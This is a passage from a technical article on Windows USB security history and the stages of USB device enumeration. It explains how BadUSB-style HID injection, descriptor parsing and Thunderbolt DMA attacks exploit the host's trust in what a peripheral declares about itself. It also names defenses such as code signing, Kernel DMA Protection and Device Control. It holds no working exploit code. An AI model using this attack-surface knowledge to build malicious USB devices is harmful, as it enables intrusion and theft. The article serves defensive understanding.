standard&apos;s bugs and pull existing vulnerable devices out of circulation&quot;&lt;/em&gt; [@wired-2014-10].&lt;/p&gt;

It could take 10 years or more to iron out the USB standard&apos;s bugs and pull existing vulnerable devices out of circulation. -- Karsten Nohl, SR Labs, quoted in Wired, October 2014 [@wired-2014-10]
&lt;p&gt;&lt;strong&gt;Generation 6 -- HID-as-weapon era (2010-present).&lt;/strong&gt; The Hak5 USB Rubber Ducky -- introduced in 2010 by Hak5 founder Darren Kitchen, who pioneered the keystroke-injection technique [@hak5-ducky-docs] -- commercialized the HID-injection primitive four years before BadUSB was disclosed. The Mark II hardware is still sold today [@hak5-shop-ducky], and DuckyScript v1 (2011) and v3 (2022) are documented end-to-end on the Hak5 documentation portal [@hak5-ducky-docs].The commercial HID-injection device predates the academic disclosure by four years. By the time BadUSB hit Black Hat in August 2014, Hak5 had already been selling a packaged keystroke-injection thumb drive at consumer prices for four years. &quot;BadUSB&quot; academicized what penetration testers were already shipping in mailers. The O.MG Cable, released by Mischief Gadgets, embedded the implant inside a USB-A-to-Lightning charging cable form factor and put a WiFi beacon inside it. The product page states the design intent verbatim: &lt;em&gt;&quot;O.MG Cables are hand made USB cables with an advance WiFi implant inside. Designed to allow Red Teams to emulate sophisticated attack scenarios previously only capable with $20,000 cables&quot;&lt;/em&gt; [@omg-cable]. The FBI&apos;s March 2020 FLASH alert -- reported by BleepingComputer at the time -- confirmed organized cybercriminal actors mailing the same primitive: &lt;em&gt;&quot;Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB devices acting as a keyboard when plugged into a computer ... These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker&quot;&lt;/em&gt; [@bleeping-fin7]. The FBI repeated the warning with a follow-on FLASH alert in January 2022 that extended the targeting to transportation, insurance, and defense companies [@wiki-badusb].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 7 -- Thunderbolt DMA and Thunderclap (NDSS 2019), Thunderspy (2020).&lt;/strong&gt; Theodore Markettos, Colin Rothwell, Brett Gutstein, Allison Pearce, Peter Neumann, Simon Moore, and Robert Watson of Cambridge, Rice, and SRI demonstrated peripheral DMA attacks against IOMMU-on platforms via shared-IOMMU-context attacks. Their NDSS 2019 paper concludes verbatim: &lt;em&gt;&quot;Windows only uses the IOMMU in limited cases and remains vulnerable&quot;&lt;/em&gt; [@ndss-thunderclap]. One year later, Björn Ruytenberg of Eindhoven University released &lt;em&gt;Thunderspy&lt;/em&gt;, a family of seven vulnerabilities extending the attack surface to firmware-reflash of the Thunderbolt controller itself: &lt;em&gt;&quot;All the attacker needs is 5 minutes alone with the computer, a screwdriver, and some easily portable hardware&quot;&lt;/em&gt; [@thunderspy]. Wikipedia preserves the May 10, 2020 disclosure date [@thunderspy-wiki].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 8 -- Kernel DMA Protection (Windows 10 1803, April 2018).&lt;/strong&gt; This is the first Windows USB-adjacent defense that targeted &lt;em&gt;trust below the descriptor parser&lt;/em&gt; rather than the parser itself. Microsoft Learn names the primitive verbatim: &lt;em&gt;&quot;Windows uses the system Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA, unless the drivers for these peripherals support memory isolation (such as DMA-remapping) ... By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen&quot;&lt;/em&gt; [@ms-kdp]. Per-driver opt-in is documented separately [@ms-dmaremap]. The same Microsoft Learn page is explicit about what KDP does &lt;em&gt;not&lt;/em&gt; defend: &lt;em&gt;&quot;Kernel DMA Protection feature doesn&apos;t protect against DMA attacks via 1394/FireWire, PCMCIA, CardBus, or ExpressCard&quot;&lt;/em&gt;. A USB 2.0 thumb drive performs no DMA at all; KDP is silent on it.&lt;/p&gt;

Kernel DMA Protection is the Windows defense that uses the platform&apos;s IOMMU (Intel VT-d, AMD-Vi, or an ARM equivalent) to confine externally connected PCIe-class peripherals to device-private memory windows. With KDP armed, a Thunderbolt or USB4 peripheral cannot read arbitrary kernel memory by issuing DMA requests, even if its driver is malicious or buggy. KDP is opt-in at three levels: silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare `DmaRemappingCompatible=1` in its INF). KDP does not protect against attacks delivered through descriptor parsing, HID injection, or mass-storage exfiltration.
&lt;p&gt;&lt;strong&gt;Generation 9 -- USB Type-C UCM stack (Windows 10 1607, 2016).&lt;/strong&gt; The User-mode Connector Manager class extension family -- &lt;code&gt;UcmCx.sys&lt;/code&gt;, &lt;code&gt;UcmUcsiCx.sys&lt;/code&gt;, &lt;code&gt;UcmTcpciCx.sys&lt;/code&gt; -- brought Power Delivery, Alternate Mode (DisplayPort, Thunderbolt, USB4), and bidirectional power-role negotiation into the Windows driver model. Microsoft Learn names the architecture verbatim: &lt;em&gt;&quot;UCM is designed by using the WDF class extension-client driver model&quot;&lt;/em&gt; [@ms-typec].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 10 -- Defender, ASR, and Device Control unification (2018-2024).&lt;/strong&gt; The Attack Surface Reduction rule set, documented in Microsoft&apos;s ASR-rule-to-GUID matrix [@ms-asr-rules], includes the rule &lt;em&gt;Block untrusted and unsigned processes that run from USB&lt;/em&gt; with GUID &lt;code&gt;b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4&lt;/code&gt;. Microsoft Defender for Endpoint Device Control followed, generally available in 2024, with per-VID/PID, per-serial-number, per-operation, and per-user policy primitives [@ms-devcontrol]. Together with the older Group Policy Device Installation Restrictions framework [@ms-gpo-devinstall] and the system-defined Device Setup Class GUIDs [@ms-devsetupclasses], these form the deployable enterprise triangle around the BadUSB / HID-injection problem.&lt;/p&gt;

timeline
    title Ten generations of Windows USB hardening
    1996 : Gen 1 : Original USB stack ships ; unsigned 32-bit drivers
    2007 : Gen 2 : KMCS on Vista x64 ; mandatory signed kernel binaries
    2009-2011 : Gen 3 : AutoRun and LNK lockdown ; KB971029 and MS10-046
    2011 : Gen 4 : Andy Davis names the descriptor parser surface
    2012 : Gen 4 cont. : USB 3.0 KMDF stack ships in Windows 8
    2014 : Gen 5 : BadUSB watershed ; SR Labs at Black Hat
    2010-2024 : Gen 6 : HID-as-weapon era ; Rubber Ducky to O.MG Cable
    2019-2020 : Gen 7 : Thunderclap and Thunderspy ; IOMMU is not enough
    2018 : Gen 8 : Kernel DMA Protection ; Windows 10 1803
    2016 : Gen 9 : USB Type-C UCM stack ; Windows 10 1607
    2018-2024 : Gen 10 : ASR, Device Control, GPO triangle ; Defender for Endpoint
&lt;p&gt;Sources, in row order: [@ms-usb-3-0-stack] for the USB 2.0 stack and the USB 3.0 KMDF rewrite; [@ms-kmcs] for the Vista x64 signing transition; [@krebs-feb2011] and [@nvd-cve-2010-2568] for the AutoRun-and-LNK lockdown; [@ncc-davis-2011] for the Andy Davis Black Hat 2011 talk; [@srlabs-badusb-pdf] and [@wiki-badusb] for the BadUSB three-author SR Labs disclosure; [@hak5-shop-ducky], [@hak5-ducky-docs], [@omg-cable], and [@bleeping-fin7] for the HID-as-weapon lineage; [@ndss-thunderclap] and [@thunderspy] for the IOMMU attack family; [@ms-kdp] and [@ms-dmaremap] for Kernel DMA Protection; [@ms-typec] for the Type-C UCM stack; [@ms-asr-rules], [@ms-devcontrol], [@ms-gpo-devinstall], and [@ms-devsetupclasses] for the modern enterprise policy triangle.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Ten generations of Windows USB hardening. Signing on top, IOMMU underneath, policy frameworks around the edges. Every one of them addressed a surface adjacent to the descriptor parser. None addressed the contract the descriptor parser has to honor: that the peripheral&apos;s self-declared identity is the only identity the host gets. Until USB-IF Authentication 1.0 ships in commodity silicon, that contract is going to outlast every defense in this section.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ten generations of hardening, each closing a single attack surface, each leaving the descriptor-trust contract intact. The single defense that &lt;em&gt;should&lt;/em&gt; close it -- USB-IF Authentication 1.0, published January 2019 -- is the next section&apos;s reckoning.&lt;/p&gt;
&lt;h2&gt;5. The Modern USB Stack as a Multi-Stage Verifier&lt;/h2&gt;
&lt;p&gt;We have walked forty years of inheritance and ten generations of layered hardening. Now we are going to do the thing the rest of this article rests on: walk a single USB device, from the millisecond it makes electrical contact to the moment a class driver attaches to it, through the nine stages Windows 11 25H2 actually executes -- by named binary, by descriptor, by trust decision.&lt;/p&gt;
&lt;p&gt;Those nine stages are a reorganisation of §1&apos;s eleven kernel-mode operations, not a different list. §1&apos;s three physical-detection operations -- port-status interrupt, port reset, speed detection -- fuse into Stage 1; §1&apos;s three default-address descriptor operations (initial 8-byte fetch, &lt;code&gt;SET_ADDRESS&lt;/code&gt;, full 18-byte fetch) fuse into Stage 2; §1&apos;s combined INF-search-and-KMCS operation splits into Stages 6 and 7; and a new Stage 9 covers the IOMMU enforcement Kernel DMA Protection performs after the class driver attaches. The arithmetic is &lt;em&gt;eleven minus two minus two plus one plus one equals nine&lt;/em&gt;. The StudyGuide question 1 at the foot of this article retains the §1 framing for exam purposes; the per-stage walk below uses the §5 reorganisation.&lt;/p&gt;

sequenceDiagram
    participant Dev as USB device
    participant XHCI as usbxhci.sys (host controller)
    participant Hub as usbhub3.sys (hub driver)
    participant CCGP as usbccgp.sys (composite parent)
    participant PnP as PnP manager
    participant IO as I/O manager
    participant Cls as Class driver (e.g. hidclass.sys)
    Dev-&amp;gt;&amp;gt;XHCI: Stage 1 -- electrical attach + port status change
    XHCI-&amp;gt;&amp;gt;Dev: Port reset + speed detection
    XHCI-&amp;gt;&amp;gt;Hub: New device on port N (default address 0)
    Hub-&amp;gt;&amp;gt;Dev: Stage 2 -- GET_DESCRIPTOR (device, first 8 bytes)
    Hub-&amp;gt;&amp;gt;Dev: SET_ADDRESS
    Hub-&amp;gt;&amp;gt;Dev: GET_DESCRIPTOR (device, full 18 bytes)
    Hub-&amp;gt;&amp;gt;Dev: Stage 3 -- GET_DESCRIPTOR (config, first 9 bytes)
    Hub-&amp;gt;&amp;gt;Dev: GET_DESCRIPTOR (config, full wTotalLength)
    Hub-&amp;gt;&amp;gt;CCGP: Stage 4 -- composite split (if bDeviceClass=0x00 or IAD present)
    CCGP-&amp;gt;&amp;gt;PnP: Per-interface PDOs
    PnP-&amp;gt;&amp;gt;PnP: Stage 5 -- synthesize hardware + compatible IDs
    PnP-&amp;gt;&amp;gt;PnP: Stage 6 -- INF database search with rank scoring
    PnP-&amp;gt;&amp;gt;IO: Stage 7 -- KMCS check on chosen function driver
    IO-&amp;gt;&amp;gt;Cls: Stage 8 -- attach class driver to device node
    IO-&amp;gt;&amp;gt;IO: Stage 9 -- IOMMU policy (KDP, if armed)
&lt;p&gt;The sources for each stage are cited inline in the prose that follows. We will walk all nine.&lt;/p&gt;
&lt;h3&gt;Stage 1: Physical detection (&lt;code&gt;usbxhci.sys&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;The xHCI host controller&apos;s hardware raises a port-status-change interrupt when a downstream port detects electrical attach. The host-controller driver -- &lt;code&gt;usbxhci.sys&lt;/code&gt; on Windows 8 and newer -- handles the interrupt, drives the port through a reset, and detects the device&apos;s negotiated speed: Low (1.5 Mbps), Full (12 Mbps), High (480 Mbps), Super (5 Gbps), or Super+ Speed (10 Gbps and beyond) [@wiki-usb]. Microsoft&apos;s architecture documentation names this verbatim: &lt;em&gt;&quot;The xHCI driver is the USB 3.0 host controller driver&quot;&lt;/em&gt; and pairs with the framework-derived host-controller extension &lt;code&gt;Ucx01000.sys&lt;/code&gt; [@ms-usb-3-0-stack]. The device, at this point, has no identity. It has a port number and a speed. It does not yet have a USB bus address; it lives at the default address (zero) until the hub assigns one.&lt;/p&gt;
&lt;h3&gt;Stage 2: Initial device-descriptor fetch (&lt;code&gt;usbhub3.sys&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;The hub driver, &lt;code&gt;usbhub3.sys&lt;/code&gt;, issues the first control transfer. The request is &lt;code&gt;bmRequestType=0x80, bRequest=GET_DESCRIPTOR, wValue=0x0100, wLength=8&lt;/code&gt; -- &quot;give me the first eight bytes of the device descriptor at default address zero.&quot; The first eight bytes carry the &lt;code&gt;bMaxPacketSize0&lt;/code&gt; field, which tells the host how to size subsequent control transfers. &lt;code&gt;SET_ADDRESS&lt;/code&gt; assigns a real bus address. A second &lt;code&gt;GET_DESCRIPTOR&lt;/code&gt; then retrieves the full eighteen-byte &lt;code&gt;USB_DEVICE_DESCRIPTOR&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This is the descriptor parser&apos;s first contact with attacker-controlled bytes -- the surface Andy Davis demonstrated as exploitable at Black Hat 2011 [@ncc-davis-2011]. The binary doing the parsing is &lt;code&gt;usbhub3.sys&lt;/code&gt;, the same hub driver §4 Generation 4 names verbatim from the architecture reference [@ms-usb-3-0-stack]. The hub driver runs in ring zero. The bytes it parses originate in the peripheral&apos;s firmware. The trust contract is one-way.&lt;/p&gt;
&lt;h3&gt;Stage 3: Configuration-descriptor fetch&lt;/h3&gt;
&lt;p&gt;The hub driver issues a third &lt;code&gt;GET_DESCRIPTOR&lt;/code&gt; for the first nine bytes of &lt;code&gt;USB_CONFIGURATION_DESCRIPTOR&lt;/code&gt; to learn the &lt;code&gt;wTotalLength&lt;/code&gt; field; a fourth fetch retrieves the full configuration, which includes one or more &lt;code&gt;USB_INTERFACE_DESCRIPTOR&lt;/code&gt;s, each followed by its &lt;code&gt;USB_ENDPOINT_DESCRIPTOR&lt;/code&gt;s and any class-specific descriptors (HID report descriptors, mass-storage CSW formats, audio control units).The two-fetch pattern -- read nine bytes to learn the size, then re-read the full block -- is a perfectly sensible engineering optimization. It also doubles the number of attacker-controlled parser entries the hub driver executes per insertion. The pragmatic optimization and the widened attack surface are the same line of code. All of this is parsed in &lt;code&gt;usbhub3.sys&lt;/code&gt; [@ms-usb-3-0-stack]. This stage is the bulk of the kernel&apos;s adversarial-input surface for USB.&lt;/p&gt;

A composite USB device is a single physical peripheral that declares multiple independent interfaces. A common pattern is a wireless-keyboard-and-mouse receiver that presents one USB interface for the keyboard and a second for the mouse. The host treats each interface as a separate logical device and binds a class driver to each. Composite-device handling is the structural primitive that makes the BadUSB *&quot;mass storage device that also presents a HID keyboard interface&quot;* attack possible inside an unmodified USB peripheral.
&lt;h3&gt;Stage 4: Composite-device split (&lt;code&gt;usbccgp.sys&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;If the device descriptor&apos;s &lt;code&gt;bDeviceClass&lt;/code&gt; is &lt;code&gt;0x00&lt;/code&gt; (deferred to interface), &lt;strong&gt;or&lt;/strong&gt; its &lt;code&gt;bDeviceClass&lt;/code&gt; / &lt;code&gt;bDeviceSubClass&lt;/code&gt; / &lt;code&gt;bDeviceProtocol&lt;/code&gt; triple is &lt;code&gt;0xEF&lt;/code&gt; / &lt;code&gt;0x02&lt;/code&gt; / &lt;code&gt;0x01&lt;/code&gt; (the Multi-Interface Function class signalled by Interface Association Descriptors), &lt;strong&gt;and&lt;/strong&gt; the device has more than one interface &lt;strong&gt;and&lt;/strong&gt; a single configuration, the hub bus driver synthesizes an additional compatible ID of &lt;code&gt;USB\COMPOSITE&lt;/code&gt;. The PnP manager&apos;s INF search then matches that compatible ID against &lt;code&gt;Usb.inf&lt;/code&gt; and loads the generic parent driver. Microsoft Learn states the architecture verbatim: &lt;em&gt;&quot;the USB generic parent driver (Usbccgp.sys) ... the generic parent driver enumerates each of these interfaces as a separate device&quot;&lt;/em&gt; [@ms-ccgp]; the USB 3.0 architecture page is verbatim about which layer does the synthesis: &lt;em&gt;&quot;The hub driver enumerates and loads the parent composite driver if deviceClass is 0 or 0xef and numInterfaces is greater than 1 in the device descriptor&quot;&lt;/em&gt; [@ms-usb-3-0-stack]. &lt;code&gt;usbccgp.sys&lt;/code&gt; then creates one child physical device object (PDO) per interface and lets the PnP manager bind a class driver to each independently. &lt;strong&gt;This is the moment a single physical thumb drive can become a thumb drive &lt;em&gt;and&lt;/em&gt; a HID keyboard.&lt;/strong&gt; Nothing in this stage cross-checks whether the combination is a plausible product; the device has declared it, and the host honors the declaration.&lt;/p&gt;
&lt;h3&gt;Stage 5: Hardware-ID and compatible-ID synthesis&lt;/h3&gt;
&lt;p&gt;The PnP manager builds two ordered lists from the descriptor fields it just parsed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Hardware IDs&lt;/em&gt; (most specific): &lt;code&gt;USB\VID_xxxx&amp;amp;PID_xxxx&amp;amp;REV_xxxx&lt;/code&gt;, &lt;code&gt;USB\VID_xxxx&amp;amp;PID_xxxx&lt;/code&gt;, and for composite devices &lt;code&gt;USB\VID_xxxx&amp;amp;PID_xxxx&amp;amp;MI_xx&lt;/code&gt; (interface number) [@ms-hwids].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Compatible IDs&lt;/em&gt; (fallback): &lt;code&gt;USB\Class_xx&amp;amp;SubClass_xx&amp;amp;Prot_xx&lt;/code&gt;, then &lt;code&gt;USB\Class_xx&amp;amp;SubClass_xx&lt;/code&gt;, then &lt;code&gt;USB\Class_xx&lt;/code&gt; [@ms-compatids].&lt;/li&gt;
&lt;/ul&gt;

A hardware ID is the most specific identifier the Plug-and-Play manager uses to bind a driver to a device. For USB, the canonical hardware ID is `USB\VID_xxxx&amp;amp;PID_xxxx&amp;amp;REV_xxxx`, derived directly from the device descriptor&apos;s `idVendor`, `idProduct`, and `bcdDevice` fields. A driver INF that names a hardware ID exactly will outrank any compatible-ID match in the rank-scored search; vendors use this to ship a vendor-specific function driver for their own hardware.

A compatible ID is a generic identifier the Plug-and-Play manager falls back to when no driver INF names the device&apos;s hardware ID. For USB, compatible IDs are class-coded: `USB\Class_03&amp;amp;SubClass_01&amp;amp;Prot_01` is a boot-protocol keyboard, `USB\Class_08&amp;amp;SubClass_06&amp;amp;Prot_50` is a SCSI-transparent mass-storage device. The inbox Microsoft class drivers (`hidusb.sys`, `usbstor.sys`, and so on) are registered against compatible IDs, which is why an unbranded thumb drive with no vendor INF still gets a working class driver on Windows.
&lt;h3&gt;Stage 6: INF database search with rank scoring&lt;/h3&gt;
&lt;p&gt;The PnP manager hands the two lists to the driver-store INF search. The algorithm is documented under &quot;How Setup Selects Drivers&quot; [@ms-pnp-rank] and is rank-arithmetic: each candidate INF is assigned a 32-bit rank, lowest wins. Roughly speaking, the rank is composed from three terms: an ID-match term (hardware-ID hit beats compatible-ID hit, and a higher hardware-ID in the list beats a lower one), a signer-trust term (a Microsoft-signed driver outranks a third-party-signed driver of equal ID specificity), and an OS-version term. The chosen INF&apos;s &lt;code&gt;[Models]&lt;/code&gt; section names the function driver [@ms-inf]. The two-phase driver-package model (introduced in Windows 8) first installs the best driver-store match for fast operation, then queries Windows Update separately for a potentially better match [@ms-pnp-rank].&lt;/p&gt;
&lt;p&gt;Worked example. A USB Mass Storage device exposes hardware ID &lt;code&gt;USB\VID_0951&amp;amp;PID_1666&lt;/code&gt; (a Kingston DataTraveler) and compatible ID &lt;code&gt;USB\Class_08&amp;amp;SubClass_06&amp;amp;Prot_50&lt;/code&gt; (SCSI-transparent bulk-only). The driver store contains the Microsoft inbox INF (&lt;code&gt;usbstor.inf&lt;/code&gt;) registered against the compatible ID and signed by Microsoft, and a third-party INF registered against the hardware ID and signed by a paid-up OEM. The rank arithmetic decides which one wins.&lt;/p&gt;

flowchart TD
    Dev[&quot;Device exposes:&lt;br /&gt;HWID=USB\VID_0951&amp;amp;PID_1666&lt;br /&gt;CompatID=USB\Class_08&amp;amp;SubClass_06&amp;amp;Prot_50&quot;]
    Dev --&amp;gt; Store[&quot;Driver store search&quot;]
    Store --&amp;gt; A[&quot;Candidate A: usbstor.inf&lt;br /&gt;Match on CompatID&lt;br /&gt;Signer: Microsoft (rank 0x00)&quot;]
    Store --&amp;gt; B[&quot;Candidate B: vendor.inf&lt;br /&gt;Match on HWID&lt;br /&gt;Signer: OEM (rank 0x01)&quot;]
    A --&amp;gt; ARank[&quot;A.rank = HWID_RANK_BASE + CompatID_term + 0x00&lt;br /&gt;= 0x0000 + 0x1003 + 0x00&lt;br /&gt;= 0x1003&quot;]
    B --&amp;gt; BRank[&quot;B.rank = HWID_term + Signer_term&lt;br /&gt;= 0x0000 + 0x01&lt;br /&gt;= 0x0001&quot;]
    ARank --&amp;gt; D{&quot;Compare ranks (lowest wins)&quot;}
    BRank --&amp;gt; D
    D --&amp;gt; Win[&quot;B wins: vendor.inf binds to USB\VID_0951&amp;amp;PID_1666&quot;]
&lt;p&gt;The exact numeric constants are policy-controlled and vary by Windows version; the structural ordering is documented [@ms-pnp-rank] [@ms-hwids] [@ms-compatids] [@ms-inf]. The takeaway is that a USB device with no hardware-ID-specific INF in the driver store always falls back to the Microsoft inbox class driver matched on compatible ID, which is why an arbitrary thumb drive declaring &lt;code&gt;bInterfaceClass=0x08&lt;/code&gt; always finds &lt;code&gt;usbstor.sys&lt;/code&gt; ready to load.&lt;/p&gt;
&lt;p&gt;{`
// Simplified model of the documented rank-scoring algorithm.
// Lower numeric rank wins; the exact constants are version-policy controlled.&lt;/p&gt;
&lt;p&gt;const HWID_BASE      = 0x0000;
const COMPATID_BASE  = 0x1000;
const POSITION_STEP  = 0x0001;
const SIGNER = { MICROSOFT: 0x00, OEM: 0x01, THIRD_PARTY: 0x02, UNSIGNED: 0x80 };&lt;/p&gt;
&lt;p&gt;function rank(match) {
  const idTerm = match.kind === &quot;HWID&quot; ? HWID_BASE : COMPATID_BASE;
  const positionTerm = match.position * POSITION_STEP;
  return idTerm + positionTerm + SIGNER[match.signer];
}&lt;/p&gt;
&lt;p&gt;const candidates = [
  { name: &quot;usbstor.inf (Microsoft inbox)&quot;,
    kind: &quot;COMPATID&quot;, position: 3, signer: &quot;MICROSOFT&quot; },
  { name: &quot;vendor.inf (Kingston OEM)&quot;,
    kind: &quot;HWID&quot;, position: 0, signer: &quot;OEM&quot; },
];&lt;/p&gt;
&lt;p&gt;const ranked = candidates
  .map(c =&amp;gt; ({ ...c, rank: rank(c).toString(16).padStart(4, &quot;0&quot;) }))
  .sort((a, b) =&amp;gt; parseInt(a.rank, 16) - parseInt(b.rank, 16));&lt;/p&gt;
&lt;p&gt;for (const c of ranked) console.log(`rank=0x${c.rank}  ${c.name}`);
console.log(&quot;Winner:&quot;, ranked[0].name);
`}&lt;/p&gt;
&lt;h3&gt;Stage 7: KMCS verification of the chosen driver&lt;/h3&gt;
&lt;p&gt;The function driver named in the winning INF is loaded. Before the I/O manager attaches it, the loader checks its signature against the Kernel-Mode Code Signing policy: signature must chain to a Microsoft-trusted root, use SHA-256, and -- if Hypervisor-Enforced Code Integrity is enabled -- pass HVCI&apos;s per-page integrity check. The driver block list and the vulnerable-driver block list are consulted. The full signing-by-version matrix is documented on Microsoft Learn [@ms-kmcs] [@ms-drvsigning].&lt;/p&gt;
&lt;p&gt;This is the canonical aha moment of the article. Kernel-Mode Code Signing certifies the &lt;em&gt;driver&lt;/em&gt;. It does not certify what the driver &lt;em&gt;consumes&lt;/em&gt;.&lt;/p&gt;

Imagine the system from KMCS&apos;s point of view. The Microsoft-signed `hidclass.sys` arrives at the kernel-mode loader. Its signature chains to a Microsoft-trusted root, its hash is correct, the HVCI memory-integrity policy is satisfied. Everything KMCS is asked to verify is verified. `hidclass.sys` loads.&lt;p&gt;At runtime, &lt;code&gt;hidclass.sys&lt;/code&gt; accepts whatever HID input event arrives on the wire. The bytes that arrive carry no signature. The peripheral that produced them was never authenticated. KMCS protects the kernel from a &lt;em&gt;malicious driver&lt;/em&gt;; the threat model assumes the data the driver consumes is honest. Against BadUSB, that assumption is exactly the inverse of true. The signed &lt;code&gt;hidclass.sys&lt;/code&gt; is the &lt;em&gt;attacker&apos;s tool&lt;/em&gt;: it is the binary that injects the malicious keystrokes into the active session.&lt;/p&gt;
&lt;p&gt;KMCS is not broken. The work it does is real and necessary; without it, the BadUSB primitive would also let an attacker load arbitrary &lt;code&gt;.sys&lt;/code&gt; files. KMCS just does not solve, and is not in the threat model of, the descriptor-trust problem. That gap is the article&apos;s recurring point.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Stage 8: Class-driver attachment&lt;/h3&gt;
&lt;p&gt;With the rank scoring decided and the function driver KMCS-verified, the I/O manager attaches the driver to the new device node and the class driver begins serving I/O. The function driver is drawn from the inbox class-driver roster catalogued in §6 -- &lt;code&gt;hidclass.sys&lt;/code&gt; and &lt;code&gt;hidusb.sys&lt;/code&gt; for HID; &lt;code&gt;usbstor.sys&lt;/code&gt; for mass storage; &lt;code&gt;winusb.sys&lt;/code&gt; for vendor-specific generic access via the Microsoft OS Descriptor mechanism [@ms-winusb]; the &lt;code&gt;UcmCx.sys&lt;/code&gt; family for Type-C connector management [@ms-typec]; and the rest of the inbox roster in §6 [@ms-usb-3-0-stack]. This is the moment a USB device transitions from a parsed PDO to a binding that exposes per-class I/O semantics to user-mode -- the IRQL boundary at which descriptor-trust becomes operational rather than merely synthesised.&lt;/p&gt;
&lt;h3&gt;Stage 9: IOMMU enforcement (Kernel DMA Protection)&lt;/h3&gt;
&lt;p&gt;If Kernel DMA Protection is armed &lt;em&gt;and&lt;/em&gt; the device is externally connected via a PCIe-tunneling fabric (Thunderbolt 3, Thunderbolt 4, USB4), the platform IOMMU places the device behind a device-specific translation domain. Pre-login DMA is blocked. Post-login DMA is allowed only into the device&apos;s own sandboxed memory if the driver opted in with &lt;code&gt;DmaRemappingCompatible=1&lt;/code&gt; in its INF [@ms-dmaremap]. KDP performs the IOMMU-mediated peripheral confinement quoted verbatim in §4 Generation 8 [@ms-kdp]. The deeper architectural treatment of Windows&apos;s hypervisor-enforced isolation primitives lives in the sibling article on the secure kernel and Virtualization-Based Security.&lt;/p&gt;

An IOMMU is a hardware unit that sits between peripherals and main memory, translating peripheral-issued DMA addresses through a per-device page table the operating system controls. Intel&apos;s implementation is called VT-d; AMD&apos;s is AMD-Vi; ARM platforms expose a System Memory Management Unit (SMMU). With an IOMMU enabled and configured by the OS, a peripheral that issues a DMA read to an address outside its sandboxed memory region gets a translation fault instead of a successful read. Without an IOMMU -- or with the IOMMU not enforcing policy on a given device -- peripheral DMA is unrestricted physical-address access to the kernel.
&lt;p&gt;A USB 2.0 thumb drive performs no DMA. KDP is silent on it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Kernel DMA Protection is a Thunderbolt-and-PCIe-over-USB-C defense. It does not apply to USB 2.0 mass storage, HID, or audio. It does not apply to a USB 3.x flash drive talking the Mass Storage Class. It applies to PCIe peripherals tunneled over the same physical connector. If your threat model is &quot;a malicious thumb drive types Mimikatz into my Start menu,&quot; KDP is not in your defense chain at all.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart TD
    subgraph HC[&quot;Host controller layer&quot;]
        XHCI[&quot;usbxhci.sys&lt;br /&gt;USB 3.0 host controller driver&quot;]
        UCX[&quot;Ucx01000.sys&lt;br /&gt;USB host controller extension (KMDF)&quot;]
    end
    subgraph Hub[&quot;Hub layer&quot;]
        H[&quot;usbhub3.sys&lt;br /&gt;USB 3.0 hub and enumeration&quot;]
    end
    subgraph Comp[&quot;Composite split&quot;]
        CCGP[&quot;usbccgp.sys&lt;br /&gt;generic parent: one PDO per interface&quot;]
    end
    subgraph Class[&quot;Class-driver layer&quot;]
        HID[&quot;hidclass.sys + hidusb.sys&lt;br /&gt;HID class&quot;]
        STOR[&quot;usbstor.sys&lt;br /&gt;Mass Storage Class&quot;]
        AUDIO[&quot;usbaudio2.sys&lt;br /&gt;Audio Class 2.0&quot;]
        VIDEO[&quot;usbvideo.sys&lt;br /&gt;USB Video Class (UVC)&quot;]
        SER[&quot;usbser.sys&lt;br /&gt;CDC Serial&quot;]
        WIN[&quot;winusb.sys&lt;br /&gt;Generic vendor access&quot;]
        UCM[&quot;UcmCx / UcmUcsiCx / UcmTcpciCx&lt;br /&gt;USB Type-C connector&quot;]
    end
    XHCI --&amp;gt; UCX
    UCX --&amp;gt; H
    H --&amp;gt; CCGP
    CCGP --&amp;gt; HID
    CCGP --&amp;gt; STOR
    CCGP --&amp;gt; AUDIO
    CCGP --&amp;gt; VIDEO
    CCGP --&amp;gt; SER
    CCGP --&amp;gt; WIN
    CCGP --&amp;gt; UCM
&lt;p&gt;Sources for the architecture diagram, layer by layer: [@ms-usb-3-0-stack] for the host-controller and hub layers (&lt;code&gt;usbxhci.sys&lt;/code&gt;, &lt;code&gt;Ucx01000.sys&lt;/code&gt;, &lt;code&gt;usbhub3.sys&lt;/code&gt;); [@ms-ccgp] for the composite parent driver &lt;code&gt;usbccgp.sys&lt;/code&gt;; [@ms-winusb] for &lt;code&gt;winusb.sys&lt;/code&gt;; [@ms-typec] for the UCM class-extension family.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Of the nine stages Windows executes between physical insertion and a class-driver attach, only two -- Stages 7 and 9 -- consult anything Windows holds as cryptographic truth. The other seven trust whatever the peripheral says, the moment the peripheral says it. KMCS certifies the driver, not the device. KDP certifies the bus, not the descriptor. The descriptor-trust gap is structural to USB; it lives in Stages 2 through 6, and no Windows-side defense has ever proposed to close it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Nine stages. Two of them are the security model the article&apos;s reader thought &lt;em&gt;was&lt;/em&gt; the security model. The other seven are descriptor parsing, ID synthesis, and INF search -- and they trust whatever the peripheral declares.&lt;/p&gt;
&lt;h2&gt;6. What Ships in Windows 11 24H2 / 25H2&lt;/h2&gt;
